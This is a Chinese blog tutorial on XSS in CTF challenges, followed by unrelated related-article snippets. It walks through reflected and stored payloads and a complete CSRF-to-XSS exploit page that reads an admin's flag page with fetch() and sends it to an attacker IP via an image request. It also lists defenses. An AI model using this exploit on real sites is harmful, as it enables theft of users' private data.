当前位置: 首页 > news >正文

CTF 中的 XSS 攻击:原理、技巧与实战案例

跨站脚本攻击(Cross-Site Scripting,简称 XSS)是一种常见的 Web 漏洞,利用该漏洞,攻击者可以在受害者浏览器中注入并执行恶意脚本。在 CTF(Capture The Flag)竞赛中,XSS 攻击不仅是一种考察 Web 安全基础的攻击技术,同时也是非常实用的进阶手段,可以用来窃取敏感信息、绕过访问控制或结合 CSRF(跨站请求伪造)实现更复杂的链式攻击。

本文将介绍 XSS 攻击的基本原理、常见类型、如何在 CTF 中利用 XSS 攻击,以及防御措施。


一、XSS 攻击基本原理

1. 什么是 XSS?

XSS 攻击指的是攻击者通过在 Web 页面中注入恶意 JavaScript 代码,使得这些代码在其他用户的浏览器中执行。通过这种方式,攻击者可以篡改页面内容、窃取用户 Cookie、劫持用户会话,甚至对用户进行钓鱼攻击。

2. XSS 的类型

  • 反射型 XSS(Reflected XSS):
    攻击者将恶意脚本嵌入到请求中,目标服务器将其反射到响应中。例如,通过 URL 参数传入恶意代码,目标页面在渲染时执行了该代码。
  • 存储型 XSS(Stored XSS):
    恶意代码被永久存储在服务器上(例如数据库、留言板),当其他用户访问包含该内容的页面时,恶意代码被执行。
  • DOM 型 XSS:
    恶意代码完全在客户端执行,通过修改页面的 DOM 结构,攻击者利用 JavaScript 动态修改页面内容,从而引发 XSS 漏洞。

二、CTF 中的 XSS 攻击

在 CTF 中,XSS 攻击通常不是为了破坏 Web 应用,而是为了获得 flag。CTF 赛题往往会设置一些特定的场景,例如存储型 XSS、反射型 XSS 或利用 CSRF 触发 XSS 链,以考察参赛者对 Web 漏洞利用链的理解和实践能力。

1. 反射型 XSS 示例

在反射型 XSS 题目中,用户提交的输入(例如 URL 参数、表单数据)被直接反射到页面中。如果输入没有经过充分过滤,攻击者可以构造如下 URL:

http://example.com/search?query=<script>alert('XSS')</script>

当其他用户点击该链接时,浏览器就会执行 alert('XSS')。在 CTF 中,这种简单的 payload 常用于证明漏洞存在。

2. 存储型 XSS 示例

存储型 XSS 攻击中,攻击者提交的数据被存储在服务器上。当其他用户(例如管理员或特定用户)访问含有该数据的页面时,恶意代码会被执行。例如,攻击者在论坛留言中提交:

<script>alert('PWNED');</script>

当管理员查看留言时,浏览器执行这段代码,攻击者可以利用此漏洞进一步窃取管理员信息或执行其他操作。

3. CSRF 与 XSS 的结合

CTF 题目中,有时会将 CSRF 与 XSS 攻击结合起来,形成攻击链。例如:

  • 利用 CSRF 诱使管理员访问一个恶意页面(由攻击者控制)。
  • 恶意页面通过反射型 XSS 载荷,让管理员的浏览器执行 JavaScript 代码。
  • 利用 JavaScript 内部的 fetch() 请求获取管理员专属的页面内容(例如包含 flag 的页面)。
  • 最终将页面内容通过 exfiltration(数据外泄)的方式发送到攻击者服务器。

这种 CSRF→XSS 链可以绕过 HttpOnly cookie 限制,因为一旦脚本在管理员浏览器中执行,它就能读取同源下的所有页面内容。


三、实战案例

下面是一段示例代码,展示如何利用 CSRF-to-XSS 链来获取 flag。假设目标应用使用 Flask 开发,管理员的 flag 隐藏在一个草稿帖子中,只有在发布后才能完整显示,而管理员默认不会发布草稿。

攻击思路如下:

  1. 利用 CSRF 让管理员的浏览器访问一个恶意页面(由攻击者托管)。
  2. 恶意页面反射 XSS 负载,利用 fetch() 请求目标页面(例如首页 /),读取包含 flag 的 HTML 内容。
  3. 利用 new Image().src 将获取到的数据以 GET 请求形式 exfiltrate 到攻击者服务器。

示例恶意页面代码:

<!DOCTYPE html>
<html>
<head><meta charset="UTF-8"><title>CSRF to XSS Attack: Publish Admin Draft</title>
</head>
<body><h1>Triggering CSRF-to-XSS Attack</h1><script>// Construct the XSS payload.// Dynamically construct the closing tag to avoid breaking the script.var payload = `<scr` + `ipt>// Use fetch() to retrieve the protected page (which now shows the full flag).fetch("http://challenge.localhost/", { credentials: "include" }).then(response => response.text()).then(data => {// Exfiltrate the data to the attacker's server.var exfilUrl = "http://10.17.108.216:8888/?flag=" + encodeURIComponent(data);new Image().src = exfilUrl;}).catch(error => console.error("Fetch error:", error));</scr` + `ipt>`;// URL-encode the payload.var encodedPayload = encodeURIComponent(payload);// Build the target URL using the /ephemeral endpoint, which reflects the msg parameter.var targetUrl = "http://challenge.localhost/ephemeral?msg=" + encodedPayload;// Create a hidden iframe to force admin's browser to load the target URL and execute the payload.var iframe = document.createElement("iframe");iframe.style.display = "none";iframe.src = targetUrl;document.body.appendChild(iframe);</script>
</body>
</html>

说明:

  • http://10.17.108.216:8888/ 替换为你攻击机的实际 IP 和监听端口。
  • 当管理员(通过 victim 工具登录 admin)访问这个页面时,iframe 会加载 http://challenge.localhost/ephemeral?msg=...,反射出 XSS 负载。
  • 执行后,fetch() 请求会获取到包含 flag 的页面内容,并通过 Image 对象将数据发送到攻击者服务器。

四、防御措施

  • 输入过滤与输出编码:
    对所有用户输入进行严格过滤,并在输出时进行适当编码,防止 HTML/JS 注入。

  • Content Security Policy (CSP):
    实施 CSP 可有效限制内嵌脚本的执行,降低 XSS 攻击风险。

  • CSRF Token:
    对敏感操作采用 CSRF token 机制,确保请求来自可信任的页面。

  • HttpOnly Cookies:
    虽然 HttpOnly 可防止 JavaScript 直接访问 Cookie,但不能防止通过 XSS 进行间接的攻击(如 fetch() 读取页面内容)。


结论

XSS 攻击在 CTF 中非常常见,其形式多样,从简单的弹出框到复杂的 CSRF-to-XSS 链式攻击。通过学习和实践这些技巧,不仅可以提高你在 CTF 中的实战能力,也能加深对 Web 安全原理的理解。希望这篇博客能帮助你了解 XSS 攻击的各种方法及防御措施,并在 CTF 比赛中取得好成绩!

Happy hacking!

相关文章:

CTF 中的 XSS 攻击:原理、技巧与实战案例

跨站脚本攻击&#xff08;Cross-Site Scripting&#xff0c;简称 XSS&#xff09;是一种常见的 Web 漏洞&#xff0c;利用该漏洞&#xff0c;攻击者可以在受害者浏览器中注入并执行恶意脚本。在 CTF&#xff08;Capture The Flag&#xff09;竞赛中&#xff0c;XSS 攻击不仅是一…...

LeetCode hot 100—二叉树的最大深度

题目 给定一个二叉树 root &#xff0c;返回其最大深度。 二叉树的 最大深度 是指从根节点到最远叶子节点的最长路径上的节点数。 示例 示例 1&#xff1a; 输入&#xff1a;root [3,9,20,null,null,15,7] 输出&#xff1a;3示例 2&#xff1a; 输入&#xff1a;root [1,n…...

.h264/.h265文件 前端直接播放

由于接收摄像头 告警视频&#xff0c;需要前端直接播放&#xff0c;不想后端转码后传输。 摄像头 判断到告警后往服务器上报 .h264 /.h265 视频文件。 解决方式&#xff1a;html5直接采用 ffmpeg 进行转码 &#xff0c;然后塞入 video标签&#xff0c;进行播放 目前改动ffmp…...

【单片机通信技术】串口通信的几种方式与比较,详细解释SPI通信

一、介绍 串口通信是一种通过串行接口逐位传输数据的通信方式&#xff0c;广泛应用于嵌入式系统、工业控制、传感器网络等领域。 二、以下是几种常见的串口通信方式及其对比&#xff1a; 1.UART&#xff08;Universal Asynchronous Receiver/Transmitter&#xff09; 特点&am…...

PDF转JPG(并去除多余的白边)

首先&#xff0c;手动下载一个软件&#xff08;poppler for Windows&#xff09;&#xff0c;下载地址&#xff1a;https://github.com/oschwartz10612/poppler-windows/releases/tag/v24.08.0-0 否则会出现以下错误&#xff1a; PDFInfoNotInstalledError: Unable to get pag…...

题目 3217 ⭐成绩统计⭐【滑动窗口 + 二分搜索】蓝桥杯2024年第十五届省赛

小蓝的班上有 n n n 个人&#xff0c;一次考试之后小蓝想统计同学们的成绩&#xff0c;第 i 名同学的成绩为 a i a_i ai​ 。当小蓝统计完前 x x x 名同学的成绩后&#xff0c;他可以从 1 ∼ x 1 ∼ x 1∼x 中选出任意 k k k 名同学的成绩&#xff0c;计算出这 k k k 个成…...

URL中的特殊字符与web安全

在现代Web应用中&#xff0c;URL作为客户端与服务器之间的通信桥梁&#xff0c;承载着大量的重要信息。URL中的特殊字符&#xff0c;看似只是一些常见的符号&#xff0c;但在Web安全领域&#xff0c;它们与其他安全知识密切相关&#xff0c;如在Base64编码、SQL注入&#xff0c…...

八卡5090服务器首发亮相!

AI 人工智能领域热度居高不下。OpenAI 的 GPT - 4 凭强悍语言处理能力&#xff0c;在内容创作、智能客服等领域广泛应用。清华大学团队的 DeepSeek 大模型在深度学习训练优势突出&#xff0c;正促使各行业应用端算力需求向推理主导转变&#xff0c;呈爆发式增长 。 随着 DeepS…...

esp32驱动带字库芯片TFT屏幕

前言 学习esp32单片机开发&#xff0c;前段时间在网上买了一块2.0寸TFT屏幕。 长这个样子&#xff0c;这个屏幕带汉字字库的硬件模块。我仔细看了一下这个字库模块上面写的字是25Q32FVSIG 1336 文档 卖家也发来了开发文档&#xff0c;是个doc文档&#xff0c;张这个样子。 开…...

为AI聊天工具添加一个知识系统 之138 设计重审 之2 文章学 引言之2 附加符号学附属诠释学附随工程学(联系)

本文要点 要点 符号学大局观&#xff1a; 诠释学&#xff08;当代 加成[0]&#xff1a;“预期”和“预设” 两者的 不期而遇 。“邂逅”&#xff09; 我们在文章学工具设计中 以全局观考虑&#xff1a;嵌入编程工具的逻辑性底&#xff08; 哲学诠释 下确界&#xff09; 并…...

java环境部署

java环境部署 一、准备工作 jrejdkeclipse jdk下载&#xff1a;21和1.8-----官网&#xff1a;Oracle&#xff1a;Java 下载 |神谕 该处选择要依据自身的系统类型选择下载 idea的下载安装&#xff1a;IntelliJ IDEA | Other Versions 二、安装 三、环境配置 四、使用 五、i…...

正点原子[第三期]Arm(iMX6U)Linux移植学习笔记-2.1 uboot简介

前言&#xff1a; 本文是根据哔哩哔哩网站上“Arm(iMX6U)Linux系统移植和根文件系统构键篇”视频的学习笔记&#xff0c;在这里会记录下正点原子 I.MX6ULL 开发板的配套视频教程所作的实验和学习笔记内容。本文大量引用了正点原子教学视频和链接中的内容。 引用&#xff1a; …...

CentOS 7.9 安装 ClickHouse 文档

1. 环境准备 确保系统为 CentOS 7.9&#xff0c;并已安装 Docker。如果未安装 Docker&#xff0c;请先安装 Docker。 安装 Docker # 卸载旧版本 Docker&#xff08;如果有&#xff09; sudo yum remove -y docker docker-client docker-client-latest docker-common docker-…...

高考數學。。。

2024上 具体来说&#xff0c;直线的参数方程可以写为&#xff1a; x1t y−t z1t 二、简答题(本大题共5小题&#xff0c;每小题7分&#xff0c;共35分。) 12.数学学习评价不仅要关注结果评价&#xff0c;也要关注过程评价。简要说明过程评价应关注哪几个方面。…...

使用GitLink个人建站服务部署Allure在线测试报告

更多技术文章&#xff0c;访问软件测试社区 文章目录 &#x1f680;前言&#x1f511;开通GitLink个人建站服务1. 前提条件2. 登录GitLink平台&#xff08;https://www.gitlink.org.cn/login&#xff09;3. 进入设置>个人建站>我的站点4. 新建站点5. 去仓部进行部署6. 安…...

Linux 上离线安装 python3

在Linux系统上进行离线安装 Python3&#xff0c;通常是因为目标机器没有网络连接。以下是一个通用的步骤指南&#xff0c;帮助你在这种情况下成功安装Python 3&#xff1a; 下载安装包 选择一台有网络连接的机器&#xff1a;这台机器的操作系统应该尽可能与目标机器相同或相似…...

js操作字符串的常用方法

1. 查找和截取​​​​​​​ 1.1 indexOf 作用&#xff1a;查找子字符串在字符串中首次出现的位置。 是否改变原字符串&#xff1a;不会改变原字符串。 返回值&#xff1a;如果找到子字符串&#xff0c;返回其起始索引&#xff08;从 0 开始&#xff09;&#xff1b;如果未…...

自动化学习-使用git进行版本管理

目录 一、为什么要学习git 二、git是什么 三、git如何使用 1、git的下载安装和配置 2、git常用的命令 3、gitee远程仓库的使用 &#xff08;1&#xff09;注册 &#xff08;2&#xff09;创建仓库 &#xff08;3&#xff09;配置公钥&#xff08;建立电脑和git…...

GCC RISCV 后端 -- GCC Passes 注释

在前面文章提到&#xff0c;当GCC 前端完成对C源代码解析完成后&#xff0c;就会使用 处理过程&#xff08;Passes&#xff09;机制&#xff0c;通过一系列的处理过程&#xff0c;将 GENERIC IR 表示的C程序 转步转换成 目标机器的汇编语言。过程描述如下图所示&#xff1a; 此…...

Ollama存在安全风险的情况通报及解决方案

据清华大学网络空间测绘联合研究中心分析&#xff0c;开源跨平台大模型工具Ollama默认配置存在未授权访问与模型窃取等安全隐患。鉴于目前DeepSeek等大模型的研究部署和应用非常广泛&#xff0c;多数用户使用Ollama私有化部署且未修改默认配置&#xff0c;存在数据泄露、算力盗…...

线程与协程

1. 线程与协程 1.1. “函数调用级别”的切换、上下文切换 1. 函数调用级别的切换 “函数调用级别的切换”是指&#xff1a;像函数调用/返回一样轻量地完成任务切换。 举例说明&#xff1a; 当你在程序中写一个函数调用&#xff1a; funcA() 然后 funcA 执行完后返回&…...

渲染学进阶内容——模型

最近在写模组的时候发现渲染器里面离不开模型的定义,在渲染的第二篇文章中简单的讲解了一下关于模型部分的内容,其实不管是方块还是方块实体,都离不开模型的内容 🧱 一、CubeListBuilder 功能解析 CubeListBuilder 是 Minecraft Java 版模型系统的核心构建器,用于动态创…...

Keil 中设置 STM32 Flash 和 RAM 地址详解

文章目录 Keil 中设置 STM32 Flash 和 RAM 地址详解一、Flash 和 RAM 配置界面(Target 选项卡)1. IROM1(用于配置 Flash)2. IRAM1(用于配置 RAM)二、链接器设置界面(Linker 选项卡)1. 勾选“Use Memory Layout from Target Dialog”2. 查看链接器参数(如果没有勾选上面…...

【RockeMQ】第2节|RocketMQ快速实战以及核⼼概念详解(二)

升级Dledger高可用集群 一、主从架构的不足与Dledger的定位 主从架构缺陷 数据备份依赖Slave节点&#xff0c;但无自动故障转移能力&#xff0c;Master宕机后需人工切换&#xff0c;期间消息可能无法读取。Slave仅存储数据&#xff0c;无法主动升级为Master响应请求&#xff…...

数据库分批入库

今天在工作中&#xff0c;遇到一个问题&#xff0c;就是分批查询的时候&#xff0c;由于批次过大导致出现了一些问题&#xff0c;一下是问题描述和解决方案&#xff1a; 示例&#xff1a; // 假设已有数据列表 dataList 和 PreparedStatement pstmt int batchSize 1000; // …...

多种风格导航菜单 HTML 实现(附源码)

下面我将为您展示 6 种不同风格的导航菜单实现&#xff0c;每种都包含完整 HTML、CSS 和 JavaScript 代码。 1. 简约水平导航栏 <!DOCTYPE html> <html lang"zh-CN"> <head><meta charset"UTF-8"><meta name"viewport&qu…...

css3笔记 (1) 自用

outline: none 用于移除元素获得焦点时默认的轮廓线 broder:0 用于移除边框 font-size&#xff1a;0 用于设置字体不显示 list-style: none 消除<li> 标签默认样式 margin: xx auto 版心居中 width:100% 通栏 vertical-align 作用于行内元素 / 表格单元格&#xff…...

OpenLayers 分屏对比(地图联动)

注&#xff1a;当前使用的是 ol 5.3.0 版本&#xff0c;天地图使用的key请到天地图官网申请&#xff0c;并替换为自己的key 地图分屏对比在WebGIS开发中是很常见的功能&#xff0c;和卷帘图层不一样的是&#xff0c;分屏对比是在各个地图中添加相同或者不同的图层进行对比查看。…...

python执行测试用例,allure报乱码且未成功生成报告

allure执行测试用例时显示乱码&#xff1a;‘allure’ &#xfffd;&#xfffd;&#xfffd;&#xfffd;&#xfffd;ڲ&#xfffd;&#xfffd;&#xfffd;&#xfffd;ⲿ&#xfffd;&#xfffd;&#xfffd;Ҳ&#xfffd;&#xfffd;&#xfffd;ǿ&#xfffd;&am…...

基于TurtleBot3在Gazebo地图实现机器人远程控制

1. TurtleBot3环境配置 # 下载TurtleBot3核心包 mkdir -p ~/catkin_ws/src cd ~/catkin_ws/src git clone -b noetic-devel https://github.com/ROBOTIS-GIT/turtlebot3.git git clone -b noetic https://github.com/ROBOTIS-GIT/turtlebot3_msgs.git git clone -b noetic-dev…...